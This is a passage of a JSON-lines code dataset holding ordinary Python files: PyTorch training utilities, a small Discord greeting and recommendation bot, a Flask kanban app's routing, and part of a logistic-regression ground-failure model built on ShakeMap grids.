np.random.shuffle(self.lengths)\n for length in self.lengths:\n idxs = self.len2idxs[length]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs], self.Y[batch_idxs]\n\n def iter_X(self):\n np.random.shuffle(self.lengths)\n for length in self.lengths:\n idxs = self.len2idxs[length]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs]\n\n def iter_X_multi(self):\n np.random.shuffle(self.lengths)\n for lengths in self.lengths:\n idxs = self.len2idxs[tuple(lengths)]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs]\n\n def print_stats(self):\n pprint(self.stats)\n\n @property\n def stats(self):\n return {l: idxs.shape[0] for l, idxs in self.len2idxs.items()}\n\n\ndef save_model(model, model_file, log=None):\n \"\"\"Save a pytorch model to model_file.\"\"\"\n if isinstance(model_file, str):\n model_file = Path(model_file)\n model_file.parent.mkdir(parents=True, exist_ok=True)\n with model_file.open(\"wb\") as out:\n torch.save(model.state_dict(), out)\n if log:\n log.info(\"saved %s\", model_file)\n\n\ndef load_model(model, model_file):\n \"\"\"Load model weights from model_file.\"\"\"\n model.load_state_dict(torch.load(model_file))\n\n\ndef emb_layer(keyed_vectors, trainable=False, use_weights=True, **kwargs):\n \"\"\"Create an Embedding layer from a gensim KeyedVectors instance.\"\"\"\n emb_weights = tensor(keyed_vectors.syn0)\n emb = nn.Embedding(*emb_weights.shape, **kwargs)\n if use_weights:\n emb.weight = nn.Parameter(emb_weights)\n emb.weight.requires_grad = trainable\n return emb\n\n\nclass Score():\n \"\"\"Keep track of a score computed by score_func, save model\n if score improves.\n \"\"\"\n def __init__(\n self, name, score_func=None, shuffle_baseline=False,\n comp=float.__gt__):\n self.name = name\n if comp == float.__lt__:\n self.current = float(\"inf\")\n self.best = 
float(\"inf\")\n else:\n self.current = 0.0\n self.best = 0.0\n self.best_model = None\n self.pred = []\n self.true = []\n self.shuffle = []\n self.score_func = score_func\n self.shuffle_baseline = shuffle_baseline\n self.comp = comp\n\n def extend(self, pred, true):\n \"\"\"append predicted and true labels\"\"\"\n self.pred.extend(pred)\n self.true.extend(true)\n\n def update(self, model=None, rundir=None, epoch=None, score=None):\n if score is None:\n score = self.score_func(self.true, self.pred)\n self.current_score = score\n if self.comp(score, self.best):\n self.best = score\n if model:\n assert rundir\n epoch_str = f\"e{epoch}_\" if epoch is not None else \"\"\n fname = f\"{epoch_str}{self.name}_{score:.4f}_model.pt\"\n model_file = rundir / fname\n save_model(model, model_file)\n self.best_model = model_file\n if self.shuffle_baseline:\n random.shuffle(self.pred)\n shuffle_score = self.score_func(self.true, self.pred)\n else:\n shuffle_score = None\n self.true = []\n self.pred = []\n return score, shuffle_score\n\n def update_log(\n self, model=None, rundir=None, epoch=None, score=None, log=None):\n score, shuffle_score = self.update(\n model=model, rundir=rundir, epoch=epoch, score=score)\n s = f\"score {self.name}_{score:.4f}/{self.best:.4f}\\n{self.best_model}\"\n if shuffle_score is not None:\n s += f\"\\nshuffle {self.name}_{shuffle_score:.4f}\"\n if log:\n log.info(s)\n else:\n print(s)\n\n @property\n def best_str(self):\n return f\"{self.name}_{self.best:.4f}\"\n\n @property\n def current_str(self):\n return f\"{self.name}_{self.current_score:.4f}\"\n\n\nclass LossTracker(list):\n \"\"\"Keep track of losses, save model if loss improves.\"\"\"\n def __init__(self, name):\n self.name = name\n self.best_loss = defaultdict(lambda: float(\"inf\"))\n self.best_model = None\n\n def interval_end(\n self, epoch=None, model=None, model_file=None, ds_name=None):\n loss = np.average(self)\n print(loss, self.best_loss[ds_name])\n if loss < self.best_loss[ds_name]:\n self.best_loss[ds_name] = loss\n if model:\n model_file = Path(str(model_file).format(\n epoch=epoch,\n ds_name=ds_name,\n loss=loss))\n save_model(model, model_file)\n self.best_model = model_file\n self.clear()\n return loss\n\n\nclass LossTrackers():\n \"\"\"Keep track of multiple losses.\"\"\"\n def __init__(self, *loss_trackers):\n self.loss_trackers = loss_trackers\n\n def append(self, *losses):\n for lt, loss in zip(self.loss_trackers, losses):\n lt.append(loss.item())\n\n def interval_end(\n self, *, epoch=None, model=None, model_file=None, ds_name=None):\n for lt in self.loss_trackers:\n yield (\n lt.name,\n lt.interval_end(\n epoch=epoch,\n model=model, model_file=model_file, ds_name=ds_name),\n lt.best_loss[ds_name])\n\n def interval_end_log(\n self, epoch, *, model=None, model_file=None, ds_name=None):\n print(f\"e{epoch} {ds_name} \" + \" \".join(\n f\"{name}_{loss:.4f}/{best:.4f}\"\n for name, loss, best in self.interval_end(\n epoch=epoch,\n model=model, model_file=model_file, ds_name=ds_name)))\n\n def best_log(self):\n print(\"best: \" + \" \".join(\n f\"{lt.name}_{lt.best_loss:.6f}\" for lt in self.loss_trackers))\n\n @staticmethod\n def from_names(*names):\n return LossTrackers(*map(LossTracker, names))\n\n def __iter__(self):\n return iter(self.loss_trackers)\n\n def __getitem__(self, i):\n return self.loss_trackers[i]\n\n\ndef get_optim(args, model):\n \"\"\"Create an optimizer according to command line args.\"\"\"\n params = [p for p in model.parameters() if p.requires_grad]\n if args.optim.lower() == 
\"adam\":\n return optim.Adam(params, lr=args.learning_rate)\n elif args.optim.lower() == \"sgd\":\n return optim.SGD(params, lr=args.learning_rate, momentum=args.momentum)\n raise ValueError(\"Unknown optimizer: \" + args.optim)\n\n\ndef tensorize_varlen_items(\n items, device=\"cuda\",\n item_dtype=torch.int64,\n startends_dtype=torch.int64):\n \"\"\"Tensorize variable-length items, e.g. a list of sentences in,\n a document with each sentence being a list of word indexes.\n This is done by creating a 'store' vector which contains the items\n in sequential order (e.g., word indexes as they occur in the document),\n and a 'startends' tensor which contains the start and end offsets of\n each item (e.g. the start and end offset of each sentence).\"\"\"\n store = torch.tensor(list(flatten(items)), device=device, dtype=item_dtype)\n lengths = list(map(len, items))\n starts = np.cumsum([0] + lengths[:-1])\n ends = np.cumsum(lengths)\n startends = np.stack([starts, ends]).T\n startends = torch.tensor(startends, device=device, dtype=startends_dtype)\n return store, startends\n","sub_path":"dougu/torchutil.py","file_name":"torchutil.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"8499172","text":"import os\nimport random\nfrom discord.ext import commands\n\nTOKEN = os.environ.get('DISCORD_TOKEN')\n\n# prefix for bot will be a ? mark\nbot = commands.Bot(command_prefix='?')\n\n\n# shows connection\n@bot.event\nasync def on_ready():\n print(f\"{bot.user.name} has connected to discord.\")\n\n\n# no command here\n# greetings to people joining server\n@bot.event\nasync def on_member_join(member):\n await member.create_dm()\n await member.dm_channel.send(\n f\"Hi {member.name}, welcome to my Discord server.\"\n )\n\n\n# using command here\n# recommend a gacha game\n@bot.command(name=\"gacha\", help=\"Just a few gacha games I've been recommended.\")\nasync def recommendations(ctx):\n gacha_games = [\n \"Azur Lane\",\n \"Fate Grand Order\",\n \"Arknights\"\n ]\n\n response = random.choice(gacha_games)\n await ctx.send(f'Try {response}')\n\n\nbot.run(TOKEN)\n","sub_path":"bot_v2_with_commands.py","file_name":"bot_v2_with_commands.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264197737","text":"import os\n\nfrom flask import Flask\nfrom flaskext.cache import Cache\n\nfrom kardboard.util import (\n PortAwareMongoEngine,\n slugify,\n timesince,\n jsonencode,\n configure_logging,\n newrelic_head,\n newrelic_foot,\n FixGunicorn\n)\n\n\ndef get_app():\n app = Flask('kardboard')\n app.config.from_object('kardboard.default_settings')\n if os.getenv('KARDBOARD_SETTINGS', None):\n app.config.from_envvar('KARDBOARD_SETTINGS')\n\n app.secret_key = app.config['SECRET_KEY']\n\n app.db = PortAwareMongoEngine(app)\n\n app.jinja_env.add_extension('kardboard.util.Markdown2Extension')\n app.jinja_env.filters['slugify'] = slugify\n app.jinja_env.filters['timesince'] = timesince\n app.jinja_env.filters['jsonencode'] = jsonencode\n app.jinja_env.globals['newrelic_head'] = newrelic_head\n app.jinja_env.globals['newrelic_foot'] = newrelic_foot\n\n configure_logging(app)\n\n try:\n from flaskext.exceptional import Exceptional\n except ImportError:\n pass\n exceptional_key = app.config.get('EXCEPTIONAL_API_KEY', '')\n if exceptional_key:\n exceptional = Exceptional(app)\n app._exceptional = exceptional\n\n app.wsgi_app = 
FixGunicorn(app.wsgi_app)\n\n return app\n\napp = get_app()\ncache = Cache(app)\n\n\nfrom kardboard.views import (\n card,\n card_add,\n card_edit,\n card_delete,\n card_block,\n card_export,\n reports_index,\n report_throughput,\n report_cycle,\n report_cycle_distribution,\n report_flow,\n report_detailed_flow,\n done,\n report_service_class,\n report_leaderboard,\n login,\n logout,\n dashboard,\n person,\n quick,\n robots,\n favicon,\n state,\n team,\n)\n\napp.add_url_rule('/', 'state', state)\napp.add_url_rule('/card//', 'card', card, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card/add/', 'card_add', card_add, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//edit/', 'card_edit', card_edit, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//delete/', 'card_delete', card_delete, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//block/', 'card_block', card_block, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card/export/', 'card_export', card_export)\napp.add_url_rule('/reports/', 'reports_index', reports_index)\napp.add_url_rule('/reports//throughput/', 'report_throughput', report_throughput)\napp.add_url_rule('/reports//throughput//', 'report_throughput', report_throughput)\napp.add_url_rule('/reports//cycle/', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle//', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle/from////', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle/distribution/', 'report_cycle_distribution', report_cycle_distribution)\napp.add_url_rule('/reports//cycle/distribution//', 'report_cycle_distribution', report_cycle_distribution)\napp.add_url_rule('/reports//flow/', 'report_flow', report_flow)\napp.add_url_rule('/reports//flow//', 'report_flow', report_flow)\napp.add_url_rule('/reports//flow/detail/', 'report_detailed_flow', report_detailed_flow)\napp.add_url_rule('/reports//flow/detail//', 'report_detailed_flow', report_detailed_flow)\napp.add_url_rule('/reports//done/', 'done', done)\napp.add_url_rule('/reports//done//', 'done', done)\napp.add_url_rule('/reports//classes/', 'report_service_class', report_service_class)\napp.add_url_rule('/reports//classes//', 'report_service_class', report_service_class)\napp.add_url_rule('/reports//leaderboard/', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard/-//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard///', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard/-//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/login/', 'login', login, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/logout/', 'logout', logout)\napp.add_url_rule('/overview/', 'dashboard', dashboard)\napp.add_url_rule('/overview///', 'dashboard', dashboard)\napp.add_url_rule('/overview////', 'dashboard', dashboard)\napp.add_url_rule('/person//', 'person', person)\napp.add_url_rule('/quick/', 'quick', quick, methods=[\"GET\"])\napp.add_url_rule('/robots.txt', 'robots', robots,)\napp.add_url_rule('/team//', 'team', team)\napp.add_url_rule('/favicon.ico', 'favicon', favicon)\n","sub_path":"kardboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"406940579","text":"#!/usr/bin/env python\n\"\"\"\nThis module contains functions and class definitions for running 
forward\nmodels of models based on logistic regression.\n\"\"\"\n\n# stdlib imports\nimport numpy as np\nimport os.path\nimport re\nimport collections\nimport shutil\nimport tempfile\nfrom timeit import default_timer as timer\n\n# third party imports\nfrom mapio.shake import ShakeGrid\nfrom mapio.shake import getHeaderData\nfrom mapio.gmt import GMTGrid\nfrom mapio.gdal import GDALGrid\nfrom mapio.grid2d import Grid2D\nfrom mapio.geodict import GeoDict\n\nfrom gfail.temphdf import TempHdf\nfrom gfail.spatial import quickcut, trim_ocean\nfrom gfail.utilities import getFileType\nfrom gfail.stats import get_rangebeta\n\n# temporary until mapio is updated\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nPARAM_PATTERN = 'b[0-9]+'\nLAYER_PATTERN = '_layer'\nTERM_PATTERN = 'term'\n\nSM_TERMS = ['MW', 'YEAR', 'MONTH', 'DAY', 'HOUR', 'pga', 'pgv', 'mmi']\nSM_GRID_TERMS = ['pga', 'pgv', 'mmi']\n# these will get np. prepended\nOPERATORS = ['log', 'log10', 'arctan', 'power', 'sqrt', 'minimum', 'pi']\nFLOATPAT = r'[+-]?(?=\\d*[.eE])(?=\\.?\\d)\\d*\\.?\\d*(?:[eE][+-]?\\d+)?'\nINTPAT = '[0-9]+'\nOPERATORPAT = r'[\\+\\-\\*\\/]*'\nMONTHS = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',\n 'Nov', 'Dec']\n\n\nclass LogisticModel(object):\n def __init__(self, shakefile, config, uncertfile=None, saveinputs=False,\n slopefile=None, bounds=None, slopemod=None,\n trimfile=None):\n \"\"\"\n Sets up the logistic model\n\n Args:\n shakefile (str): Path to shakemap grid.xml file for the event.\n config: configobj object defining the model and its inputs. Only\n one model should be described in each config file.\n uncertfile (str): Path to uncertainty.xml file.\n saveinputs (bool): Save input layers as Grid2D objects in addition\n to the model? If false (the default), it will just output the\n model.\n slopefile (str): Optional path to slopefile that will be resampled\n to the other input files for applying thresholds. OVERWRITES\n VALUE IN CONFIG.\n bounds (dict): Default of None uses ShakeMap boundaries, otherwise\n a dictionary of boundaries to cut to like\n\n .. code-block:: python\n\n bounds = {\n 'xmin': lonmin, 'xmax': lonmax,\n 'ymin': latmin, 'ymax': latmax\n }\n slopemod (str): How slope input should be modified to be in\n degrees: e.g., ``np.arctan(slope) * 180. 
/ np.pi`` or\n ``slope/100.`` (note that this may be in the config file\n already).\n trimfile (str): shapefile of earth's landmasses to use to cut\n offshore areas.\n \"\"\"\n mnames = getLogisticModelNames(config)\n if len(mnames) == 0:\n raise Exception('No config file found or problem with config '\n 'file format')\n if len(mnames) > 1:\n raise Exception('Config file contains more than one model which '\n 'is no longer allowed, update your config file '\n 'to the newer format')\n\n self.model = mnames[0]\n self.config = config\n cmodel = config[self.model]\n self.modeltype = cmodel['gfetype']\n self.coeffs = validateCoefficients(cmodel)\n # key = layer name, value = file name\n self.layers = validateLayers(cmodel)\n self.terms, timeField = validateTerms(cmodel, self.coeffs, self.layers)\n self.interpolations = validateInterpolations(cmodel, self.layers)\n self.units = validateUnits(cmodel)\n self.gmused = [value for term, value in cmodel['terms'].items()\n if 'pga' in value.lower() or 'pgv' in\n value.lower() or 'mmi' in value.lower()]\n self.modelrefs, self.longrefs, self.shortrefs = validateRefs(cmodel)\n # self.numstd = numstd\n self.clips = validateClips(cmodel, self.layers, self.gmused)\n self.notes = ''\n\n if cmodel['baselayer'] not in list(self.layers.keys()):\n raise Exception('You must specify a base layer corresponding to '\n 'one of the files in the layer section.')\n self.saveinputs = saveinputs\n if slopefile is None:\n try:\n self.slopefile = cmodel['slopefile']\n except BaseException:\n # print('Slopefile not specified in config, no slope '\n # 'thresholds will be applied\\n')\n self.slopefile = None\n else:\n self.slopefile = slopefile\n if slopemod is None:\n try:\n self.slopemod = cmodel['slopemod']\n except BaseException:\n self.slopemod = None\n\n # See if trimfile exists\n if trimfile is not None:\n if not os.path.exists(trimfile):\n print(\n 'trimfile defined does not exist: %s\\nOcean will not be '\n 'trimmed' % trimfile)\n self.trimfile = None\n elif os.path.splitext(trimfile)[1] != '.shp':\n print('trimfile must be a shapefile, ocean will not be '\n 'trimmed')\n self.trimfile = None\n else:\n self.trimfile = trimfile\n else:\n self.trimfile = None\n\n # Get month of event\n griddict, eventdict, specdict, fields, uncertainties = \\\n getHeaderData(shakefile)\n MONTH = MONTHS[eventdict['event_timestamp'].month - 1]\n\n # Figure out how/if need to cut anything\n geodict = ShakeGrid.getFileGeoDict(shakefile, adjust='res')\n if bounds is not None: # Make sure bounds are within ShakeMap Grid\n if geodict.xmin < geodict.xmax: # only if signs are not opposite\n if (geodict.xmin > bounds['xmin'] or\n geodict.xmax < bounds['xmax'] or\n geodict.ymin > bounds['ymin'] or\n geodict.ymax < bounds['ymax']):\n print('Specified bounds are outside shakemap area, using '\n 'ShakeMap bounds instead.')\n bounds = None\n\n if bounds is not None:\n tempgdict = GeoDict.createDictFromBox(\n bounds['xmin'], bounds['xmax'],\n bounds['ymin'], bounds['ymax'],\n geodict.dx, geodict.dy, inside=False)\n # If Shakemap geodict crosses 180/-180 line, fix geodict so\n # things don't break\n if geodict.xmin > geodict.xmax:\n if tempgdict.xmin < 0:\n geodict._xmin -= 360.\n else:\n geodict._xmax += 360.\n gdict = geodict.getBoundsWithin(tempgdict)\n else:\n gdict = geodict\n\n # Now find the layer that is our base layer and get the largest bounds\n # we can guarantee not to exceed shakemap bounds\n basefile = self.layers[cmodel['baselayer']]\n ftype = getFileType(basefile)\n if ftype == 'esri':\n 
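            # Note: the base layer fixes the model's sampling grid; its geodict is trimmed to the ShakeMap-derived bounds (gdict) and every other input layer is later resampled onto that grid (optionally refined by 'divfactor').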
basegeodict, firstcol = GDALGrid.getFileGeoDict(basefile)\n if basegeodict == gdict:\n sampledict = gdict\n else:\n sampledict = basegeodict.getBoundsWithin(gdict)\n elif ftype == 'gmt':\n basegeodict, firstcol = GMTGrid.getFileGeoDict(basefile)\n if basegeodict == gdict:\n sampledict = gdict\n else:\n sampledict = basegeodict.getBoundsWithin(gdict)\n else:\n raise Exception('All predictor variable grids must be a valid '\n 'GMT or ESRI file type.')\n\n # Do we need to subdivide baselayer?\n if 'divfactor' in self.config[self.model].keys():\n divfactor = float(self.config[self.model]['divfactor'])\n if divfactor != 1.:\n # adjust sampledict so everything will be resampled\n newxmin = sampledict.xmin - sampledict.dx / \\\n 2. + sampledict.dx / (2. * divfactor)\n newymin = sampledict.ymin - sampledict.dy / \\\n 2. + sampledict.dy / (2. * divfactor)\n newxmax = sampledict.xmax + sampledict.dx / \\\n 2. - sampledict.dx / (2. * divfactor)\n newymax = sampledict.ymax + sampledict.dy / \\\n 2. - sampledict.dy / (2. * divfactor)\n newdx = sampledict.dx / divfactor\n newdy = sampledict.dy / divfactor\n if np.abs(newxmax) > 180.:\n newxmax = np.sign(newxmax) * 180.\n if np.abs(newxmin) > 180.:\n newxmin = np.sign(newxmin) * 180.\n\n sampledict = GeoDict.createDictFromBox(\n newxmin, newxmax, newymin,\n newymax, newdx, newdy, inside=True)\n\n # Find slope thresholds, if applicable\n self.slopemin = 'none'\n self.slopemax = 'none'\n if self.slopefile is not None:\n try:\n self.slopemin = float(config[self.model]['slopemin'])\n self.slopemax = float(config[self.model]['slopemax'])\n except BaseException:\n print('Could not find slopemin and/or slopemax in config, '\n 'limits. No slope thresholds will be applied.')\n self.slopemin = 'none'\n self.slopemax = 'none'\n\n # Make temporary directory for hdf5 pytables file storage\n self.tempdir = tempfile.mkdtemp()\n\n # now load the shakemap, resampling and padding if necessary\n temp = ShakeGrid.load(shakefile) # , adjust='res')\n self.shakedict = temp.getShakeDict()\n self.eventdict = temp.getEventDict()\n self.shakemap = {}\n\n # Read both PGA and PGV in, may need them for thresholds\n for gm in ['pga', 'pgv']:\n junkfile = os.path.join(self.tempdir, 'temp.bil')\n GDALGrid.copyFromGrid(temp.getLayer(gm)).save(junkfile)\n if gm in self.interpolations.keys():\n intermeth = self.interpolations[gm]\n else:\n intermeth = 'bilinear'\n junkgrid = quickcut(junkfile, sampledict, precise=True,\n method=intermeth, override=True)\n if gm in self.clips:\n junkgrid.setData(np.clip(junkgrid.getData(),\n self.clips[gm][0], self.clips[gm][1]))\n self.shakemap[gm] = TempHdf(\n junkgrid, os.path.join(self.tempdir, '%s.hdf5' % gm))\n os.remove(junkfile)\n del(temp)\n\n # get updated geodict\n sampledict = junkgrid.getGeoDict()\n\n # take uncertainties into account, if available\n if uncertfile is not None:\n self.uncert = {}\n # try:\n # Only read in the ones that will be needed\n temp = ShakeGrid.load(uncertfile)\n already = []\n for gm in self.gmused:\n if 'pgv' in gm:\n gmsimp = 'pgv'\n elif 'pga' in gm:\n gmsimp = 'pga'\n elif 'mmi' in gm:\n gmsimp = 'mmi'\n if gmsimp in already:\n continue\n junkfile = os.path.join(self.tempdir, 'temp.bil')\n GDALGrid.copyFromGrid(temp.getLayer(\n 'std%s' % gmsimp)).save(junkfile)\n if gmsimp in self.interpolations.keys():\n intermeth = self.interpolations[gmsimp]\n else:\n intermeth = 'bilinear'\n junkgrid = quickcut(junkfile, sampledict, precise=True,\n method=intermeth, override=True)\n if gmsimp in self.clips:\n junkgrid.setData(\n 
np.clip(junkgrid.getData(), self.clips[gmsimp][0],\n self.clips[gmsimp][1]))\n self.uncert['std' + gmsimp] = TempHdf(\n junkgrid, os.path.join(self.tempdir,\n 'std%s.hdf5' % gmsimp))\n already.append(gmsimp)\n os.remove(junkfile)\n del(temp)\n # except:\n # print('Could not read uncertainty file, ignoring '\n # 'uncertainties')\n # self.uncert = None\n else:\n self.uncert = None\n\n # Load the predictor layers, save as hdf5 temporary files, put file\n # locations into a dictionary.\n\n # Will be replaced in the next section if a slopefile was defined\n self.nonzero = None\n\n # key = layer name, value = grid object\n self.layerdict = {}\n\n didslope = False\n for layername, layerfile in self.layers.items():\n start = timer()\n if isinstance(layerfile, list):\n for lfile in layerfile:\n if timeField == 'MONTH':\n if lfile.find(MONTH) > -1:\n layerfile = lfile\n # ftype = getFileType(layerfile)\n interp = self.interpolations[layername]\n temp = quickcut(layerfile, sampledict,\n precise=True, method=interp)\n if layername in self.clips:\n temp.setData(\n np.clip(temp.getData(),\n self.clips[layername][0],\n self.clips[layername][1]))\n self.layerdict[layername] = TempHdf(\n temp, os.path.join(self.tempdir,\n '%s.hdf5' % layername))\n del(temp)\n else:\n interp = self.interpolations[layername]\n temp = quickcut(layerfile, sampledict,\n precise=True, method=interp)\n if layername in self.clips:\n temp.setData(\n np.clip(temp.getData(),\n self.clips[layername][0],\n self.clips[layername][1]))\n # Convert unconsolidated sediments to more reasonable coeff\n if layername == 'rock':\n sub1 = temp.getData()\n # Change to mixed sed rock coeff\n sub1[sub1 <= -3.21] = -1.36\n temp.setData(sub1)\n self.notes += 'unconsolidated sediment coefficient ' \\\n 'changed to -1.36 (weaker) from -3.22 to ' \\\n 'better reflect that this ' \\\n 'unit is not actually strong\\n'\n self.layerdict[layername] = TempHdf(\n temp, os.path.join(self.tempdir, '%s.hdf5' % layername))\n td = temp.getGeoDict()\n if td != sampledict:\n raise Exception(\n 'Geodictionaries of resampled files do not match')\n\n if layerfile == self.slopefile:\n flag = 0\n if self.slopemin == 'none' and self.slopemax == 'none':\n flag = 1\n if self.slopemod is None:\n slope1 = temp.getData().astype(float)\n slope = 0\n else:\n try:\n slope = temp.getData().astype(float)\n slope1 = eval(self.slopemod)\n except BaseException:\n print('slopemod provided not valid, continuing '\n 'without slope thresholds.')\n flag = 1\n if flag == 0:\n nonzero = np.array(\n [(slope1 > self.slopemin) &\n (slope1 <= self.slopemax)])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n del(slope)\n else:\n # Still remove areas where the slope equals exactly\n # 0.0 to remove offshore liq areas.\n nonzero = np.array([slope1 != 0.0])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n didslope = True\n del(temp)\n\n print('Loading %s layer: %1.1f sec'\n % (layername, timer() - start))\n\n if didslope is False and self.slopefile is not None:\n # Slope didn't get read in yet\n temp = quickcut(self.slopefile, sampledict, precise=True,\n method='bilinear')\n flag = 0\n if self.slopemin == 'none' and self.slopemax == 'none':\n flag = 1\n if self.slopemod is None:\n slope1 = temp.getData().astype(float)\n slope = 0\n else:\n try:\n slope = temp.getData().astype(float)\n slope1 = eval(self.slopemod)\n except BaseException:\n print('slopemod provided not valid, continuing without '\n 'slope thresholds')\n flag = 1\n if flag == 0:\n nonzero = np.array([(slope1 > self.slopemin) &\n 
(slope1 <= self.slopemax)])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n del(slope)\n else:\n # Still remove areas where the slope equals exactly\n # 0.0 to remove offshore liq areas.\n nonzero = np.array([slope1 != 0.0])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n\n self.nuggets = [str(self.coeffs['b0'])]\n\n ckeys = sorted(self.terms.keys())\n for key in ckeys:\n term = self.terms[key]\n coeff = self.coeffs[key]\n self.nuggets.append('(%g * %s)' % (coeff, term))\n\n self.equation = ' + '.join(self.nuggets)\n self.geodict = sampledict\n\n def getEquations(self):\n \"\"\"\n Method for LogisticModel class to extract strings defining the\n equations for the model for median ground motions.\n\n Returns:\n equation: the equation for median ground motions,\n\n \"\"\"\n return self.equation\n\n def getGeoDict(self):\n \"\"\"\n Returns the geodictionary of the LogisticModel class defining bounds\n and resolution of model inputs and outputs.\n\n Returns:\n geodict: mapio geodict object\n \"\"\"\n return self.geodict\n\n def calculate(self, cleanup=True, rowmax=300, colmax=None):\n \"\"\"\n Calculate the model.\n\n Args:\n cleanup (bool): If True, delete temporary hdf5 files\n rowmax (int): Number of rows to compute at once; If None, all rows\n will be computed at once.\n colmax (int): Number of columns to compute at once; If None, all\n columns will be computed at once.\n Returns:\n dict: Dictionary containing the model results (and model inputs if\n saveinputs was set to True). See\n `the description `_\n of the structure.\n \"\"\"\n tk = list(self.shakemap.keys())[0]\n # Figure out what slices to do\n rowstarts, rowends, colstarts, colends = \\\n self.shakemap[tk].getSliceDiv(rowmax, colmax)\n\n # Make empty matrix to fill\n X = np.empty([self.geodict.ny, self.geodict.nx])\n\n # Loop through slices, appending output each time\n for rowstart, rowend, colstart, colend in \\\n zip(rowstarts, rowends, colstarts, colends):\n X[rowstart:rowend, colstart:colend] = eval(self.equation)\n\n P = 1 / (1 + np.exp(-X))\n\n if 'vs30max' in self.config[self.model].keys():\n vs30 = self.layerdict['vs30'].getSlice(\n None, None, None, None, name='vs30')\n P[vs30 > float(self.config[self.model]['vs30max'])] = 0.0\n\n if 'minpgv' in self.config[self.model].keys():\n pgv = self.shakemap['pgv'].getSlice(\n None, None, None, None, name='pgv')\n P[pgv < float(self.config[self.model]['minpgv'])] = 0.0\n\n if 'minpga' in self.config[self.model].keys():\n pga = self.shakemap['pga'].getSlice(\n None, None, None, None, name='pga')\n P[pga < float(self.config[self.model]['minpga'])] = 0.0\n\n if self.uncert is not None: # hard code for now\n if 'Zhu and others (2017)' in self.modelrefs['shortref']:\n if 'stddev' in self.layerdict.keys():\n stdX = self.layerdict['stddev'].getSlice()\n else:\n stdX = float(self.config[self.model]['default_stddev'])\n varX = stdX**2. + \\\n (self.coeffs['b1']**2. *\n self.uncert['stdpgv'].getSlice()**2.)\n varP = (np.exp(-X) / (np.exp(-X) + 1)**2.)**2. * varX\n if 'coverage' in self.config[self.model].keys():\n a = 0.4915\n b = 42.4\n c = 9.165\n # ((2*a*b*c*np.exp(2*c*P))/(b+np.exp(c*P))**3.)**2.*varP\n varL = ((2 * a * b * c * np.exp(-c * P)) /\n ((1 + b * np.exp(-c * P))**3.))**2. 
* varP\n std1 = np.sqrt(varL)\n else:\n std1 = np.sqrt(varP)\n elif 'Jessee' in self.modelrefs['shortref']:\n if 'stddev' in self.layerdict.keys():\n stdX = self.layerdict['stddev'].getSlice()\n else:\n stdX = float(self.config[self.model]['default_stddev'])\n cfs = self.coeffs\n slp = self.layerdict['slope']\n std = self.uncert['stdpgv']\n varX = stdX**2. + ((\n cfs['b1'] + cfs['b6'] *\n (np.arctan(slp.getSlice()) * 180 / np.pi))**2.\n * std.getSlice()**2.)\n varP = (np.exp(-X) / (np.exp(-X) + 1)**2.)**2. * varX\n if 'coverage' in self.config[self.model].keys():\n a = -7.592\n b = 5.237\n c = -3.042\n d = 4.035\n varL = (np.exp(a + b * P + c * P**2. + d * P**3.) *\n (b + 2. * P * c + 3. * d * P**2.))**2. * varP\n std1 = np.sqrt(varL)\n else:\n std1 = np.sqrt(varP)\n else:\n print('cannot do uncertainty for %s model, skipping' %\n self.modelrefs['shortref'])\n self.uncert = None\n std1 = None\n else:\n std1 = None\n\n # P needs to be converted to areal coverage AFTER dealing with uncert\n if 'coverage' in self.config[self.model].keys():\n eqn = self.config[self.model]['coverage']['eqn']\n P = eval(eqn)\n\n # Compute quantiles\n compute_quantiles = False\n mconf = self.config[self.model]\n if(('conf_int_probabilities' in mconf) and\n (std1 is not None)):\n compute_quantiles = True\n ci_probabilities = [\n float(cip) for cip in mconf['conf_int_probabilities']]\n\n if compute_quantiles:\n quantile_dict = {}\n pmax = float(mconf['maxprob'])\n beta_p = P / pmax * (((pmax * P - P**2) / std1**2) - 1)\n beta_q = (1 - P / pmax) * (((pmax * P - P**2) / std1**2) - 1)\n for ci_prob in ci_probabilities:\n min_quantile = str(np.round(100 * (1.0 - ci_prob) / 2.0, 1))\n max_quantile = str(np.round(\n 100 * (1 - ((1.0 - ci_prob)) / 2.0), 1))\n min_prob, max_prob = get_rangebeta(\n beta_p, beta_q, ci_prob, minlim=0, maxlim=pmax)\n quantile_dict[min_quantile] = min_prob\n quantile_dict[max_quantile] = max_prob\n\n if self.slopefile is not None and self.nonzero is not None:\n # Apply slope min/max limits\n print('applying slope thresholds')\n P = P * self.nonzero\n if std1 is not None:\n # No 